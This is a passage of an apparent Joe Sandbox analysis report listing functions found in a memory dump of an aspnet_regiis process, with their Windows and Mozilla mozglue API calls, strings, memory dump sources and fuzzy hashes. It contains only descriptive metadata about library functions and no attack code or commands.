                                                                                                                                                                    • Instruction Fuzzy Hash: 085160B1604706DFC714DF34C588AAABBF4FF89358F10862EE85A87B11DB30A945CB95
                                                                                                                                                                    Function 6C7B5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C7B56D1
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7B56E9
                                                                                                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C7B56F1
                                                                                                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C7B5744
                                                                                                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C7B57BC
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C7B58CB
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B58F3
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7B5945
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B59B2
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C81F638,?,?,?,?), ref: 6C7B59E9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                    • String ID: MOZ_APP_RESTART
                                                                                                                                                                    • API String ID: 2752551254-2657566371
                                                                                                                                                                    • Opcode ID: fe1581bc2544104f1ced3d7969ec329467fda25f668d80da41e9f3ca6ae9f03b
                                                                                                                                                                    • Instruction ID: db4c2057f08c811ef6dc1e7589bac625f91fde9d4933c323bb62b001ad00c81a
                                                                                                                                                                    • Opcode Fuzzy Hash: fe1581bc2544104f1ced3d7969ec329467fda25f668d80da41e9f3ca6ae9f03b
                                                                                                                                                                    • Instruction Fuzzy Hash: CFC1A071A083419FD715CF28D54566ABBF1FFDA718F058A2DE4C8A7B21D730A885CB82
                                                                                                                                                                    Function 6C7DEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEC84
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DEC8C
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DECA1
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DECAE
                                                                                                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C7DECC5
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DED0A
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C7DED19
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C7DED28
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7DED2F
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DED59
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C7DEC94
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                    • API String ID: 4057186437-125001283
                                                                                                                                                                    • Opcode ID: 31ac60bef4d2166a946fbff221923ef03627a1517d1236a7aa8fb315a1fb2200
                                                                                                                                                                    • Instruction ID: da48f8e58e8be1b5525afcc6f822121e9d9c46a83fc7a8bf193b556a1d703504
                                                                                                                                                                    • Opcode Fuzzy Hash: 31ac60bef4d2166a946fbff221923ef03627a1517d1236a7aa8fb315a1fb2200
                                                                                                                                                                    • Instruction Fuzzy Hash: 432107B160010A9FDB119F65D90EBAB77B9EB5626DF114230FC1897F41DB31A805CBE1
                                                                                                                                                                    Function 6C7F5FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6C7F6009
                                                                                                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C7F6024
                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Qyl,?), ref: 6C7F6046
                                                                                                                                                                    • OutputDebugStringA.KERNEL32(?,Qyl,?), ref: 6C7F6061
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7F6069
                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F6073
                                                                                                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F6082
                                                                                                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C81148E), ref: 6C7F6091
                                                                                                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Qyl,00000000,?), ref: 6C7F60BA
                                                                                                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F60C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                                                                    • String ID: Qyl
                                                                                                                                                                    • API String ID: 3835517998-4009424572
                                                                                                                                                                    • Opcode ID: 679e0707ec2fa78dcef8b5be253803e9648ef06b34286c3f9df2cab43800c52d
                                                                                                                                                                    • Instruction ID: 53dfe88f589177023959c3f7606c6c7fc807bf479be474cb1d108fd520238549
                                                                                                                                                                    • Opcode Fuzzy Hash: 679e0707ec2fa78dcef8b5be253803e9648ef06b34286c3f9df2cab43800c52d
                                                                                                                                                                    • Instruction Fuzzy Hash: 6821A3B1A002199FDB205F24DC4DAAA7BF8FF45318F108438E85A97741CB75AA49CFD2
                                                                                                                                                                    Function 6C7D8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C79EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C79EB83
                                                                                                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C7DB392,?,?,00000001), ref: 6C7D91F4
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                    • API String ID: 3790164461-3347204862
                                                                                                                                                                    • Opcode ID: 101a1cdd923d40e0bb818f8bc4ef1c94c67860c8164bfe4cdd0d0b3c2af45fab
                                                                                                                                                                    • Instruction ID: 3d360b7210752a7d3eadde5285749d55867da089339b6c8dba3f8ecad2021078
                                                                                                                                                                    • Opcode Fuzzy Hash: 101a1cdd923d40e0bb818f8bc4ef1c94c67860c8164bfe4cdd0d0b3c2af45fab
                                                                                                                                                                    • Instruction Fuzzy Hash: D0B1F6B1B0120A9BCB14CF94CA5ABEEBBB5BF95318F514529D4016BF80DB31E909CBD1
                                                                                                                                                                    Function 6C7BC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7BC5A3
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7BC9EA
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7BC9FB
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C7BCA12
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7BCA2E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7BCAA5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                    • String ID: (null)$0
                                                                                                                                                                    • API String ID: 4074790623-38302674
                                                                                                                                                                    • Opcode ID: 055fcc5be3e914ba3d4ee96a12819413b03bbc51e64dd7feb807d73a93decf1a
                                                                                                                                                                    • Instruction ID: f2096fc9fa2625f0c1bb6b166f3aa7bbec5bf5100c6e6152790296d7ff3473e0
                                                                                                                                                                    • Opcode Fuzzy Hash: 055fcc5be3e914ba3d4ee96a12819413b03bbc51e64dd7feb807d73a93decf1a
                                                                                                                                                                    • Instruction Fuzzy Hash: F5A1BE706083428FDB10DF28C658B5ABBE1FF89749F08882DE999E7742D735D805CB92
                                                                                                                                                                    Function 6C7BC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7BC784
                                                                                                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7BC801
                                                                                                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C7BC83D
                                                                                                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BC891
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                                                                    • String ID: INF$NAN$inf$nan
                                                                                                                                                                    • API String ID: 1991403756-4166689840
                                                                                                                                                                    • Opcode ID: 5b7241043ed908665e870c8595995970d8c8a4e59917d51a6cf01e3eb7f7d970
                                                                                                                                                                    • Instruction ID: 0aa9d390b03ff304164d3e7f9924376408baf8bcd205ed426c1d9f1e132419e3
                                                                                                                                                                    • Opcode Fuzzy Hash: 5b7241043ed908665e870c8595995970d8c8a4e59917d51a6cf01e3eb7f7d970
                                                                                                                                                                    • Instruction Fuzzy Hash: F651A4706087808BD710DF2DC68569AFBF0BF9A349F008A2DE9D5A7651E770D988CB42
                                                                                                                                                                    Function 6C793480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C793492
                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7934A9
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7934EF
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C79350E
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C793522
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C793552
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C79357C
                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C793592
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                    • API String ID: 3634367004-706389432
                                                                                                                                                                    • Opcode ID: db4188aa938f5a8a655dc0245f766d5c41115697102f47f2980e6417f345c011
                                                                                                                                                                    • Instruction ID: 6ba2f47bbb3b7bcc473afbb8cf48a841a7088857fd2565d2d28547d075485447
                                                                                                                                                                    • Opcode Fuzzy Hash: db4188aa938f5a8a655dc0245f766d5c41115697102f47f2980e6417f345c011
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A31B0B0B002079BDF20DFB5DA49AAA77F5FB59309F100439E505D3B50DB30A900CBA1
                                                                                                                                                                    Function 6C794480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$moz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3009372454-0
                                                                                                                                                                    • Opcode ID: d49a6bb3c43cd2d8e24f57f8cbde39c7083861655b0eb536f3ff87f92f4cfce1
                                                                                                                                                                    • Instruction ID: 34697c7e0ab59ca8f9e19feeea48fdc045594e5b4f889d2357d0a79d7cdfe900
                                                                                                                                                                    • Opcode Fuzzy Hash: d49a6bb3c43cd2d8e24f57f8cbde39c7083861655b0eb536f3ff87f92f4cfce1
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CB1F372A001108FDB18DE7CEE9876D77B6AF42328F184679E436DFB92D73098409B81
                                                                                                                                                                    Function 6C7FAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1192971331-0
                                                                                                                                                                    • Opcode ID: 45c219b8a0a300bbf8f03d7957d8243a6b66858b6d05360e9e256866320ab043
                                                                                                                                                                    • Instruction ID: df0144a9a4d24f138bee199134bf90cef9de784b4d04b5c53b03395a4b1a6dd0
                                                                                                                                                                    • Opcode Fuzzy Hash: 45c219b8a0a300bbf8f03d7957d8243a6b66858b6d05360e9e256866320ab043
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C315EB1A047058FDB00AF78D68A26EBBF0BF85319F01493DE99987711EB709459CB92
                                                                                                                                                                    Function 6C7A9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C7A9675
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A9697
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7A96E8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C7A9707
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A971F
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9773
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7A97B7
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97D0
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97EB
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9824
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                    • API String ID: 409848716-3880535382
                                                                                                                                                                    • Opcode ID: 3afa18586eaba835a8cb8e2d542dcf5a08de4a1fadde65bf19af3d474b71bcc1
                                                                                                                                                                    • Instruction ID: 5269ea4fbd53356dfd8f57e232d3a5588fc57067972b460e7107073ecf6c8e7f
                                                                                                                                                                    • Opcode Fuzzy Hash: 3afa18586eaba835a8cb8e2d542dcf5a08de4a1fadde65bf19af3d474b71bcc1
                                                                                                                                                                    • Instruction Fuzzy Hash: 20418EB07042469BDF20CFA4DA89A9677F4EB6A328F004A38FD1587F40D730A815CBE1
                                                                                                                                                                    Function 6C791E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C791EC1
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C791EE1
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E744), ref: 6C791F38
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E744), ref: 6C791F5C
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C791F83
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C791FC0
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81E784), ref: 6C791FE2
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81E784), ref: 6C791FF6
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C792019
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
